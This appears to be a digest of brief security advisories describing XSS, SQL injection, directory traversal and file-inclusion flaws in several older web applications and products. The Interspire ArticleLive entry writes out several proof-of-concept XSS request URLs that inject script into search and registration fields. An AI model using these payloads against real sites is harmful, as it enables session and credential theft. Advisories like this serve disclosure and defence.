Variable $DEFAULT_SKIN not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.
FishCart is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input. A successful exploit of the SQL-injection issues could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation. An attacker may leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
SimpleCam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. An attacker can exploit this issue by crafting a malicious URL that contains directory traversal characters.
Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks. Interspire ArticleLive 2005 is reportedly affected by these issues. An attacker can exploit these issues by sending maliciously crafted requests to the vulnerable application. Examples of such requests include: http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categories=0, http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</script>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab, http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab, http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab, http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab, http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab, http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
Apple Mac OS X is prone to a directory-traversal vulnerability. Since the software fails to sufficiently sanitize input, a remote attacker could use the Bluetooth file- and object-exchange services to access files outside the default file-exchange directory.
The Adobe SVG Viewer ActiveX control is prone to an information disclosure vulnerability. Reports indicate that the Adobe SVG Viewer ActiveX control may be employed to disclose the existence of a target file. Information that is harvested by leveraging this vulnerability may be used to aid in further attacks.
ASP Inline Corporate Calendar is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.
Gossamer Threads Links is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
WebCrossing is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
SitePanel2 is affected by multiple input validation vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. Multiple cross-site scripting issues affect the application. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. SitePanel2 is prone to a directory traversal vulnerability. This vulnerability could be exploited to retrieve sensitive or privileged information normally accessible to the Web server. The application is also vulnerable to file include, upload and deletion vulnerabilities. These issues could permit the execution of arbitrary code in the context of the affected Web site or the deletion of arbitrary files accessible to the application.
Services By CQR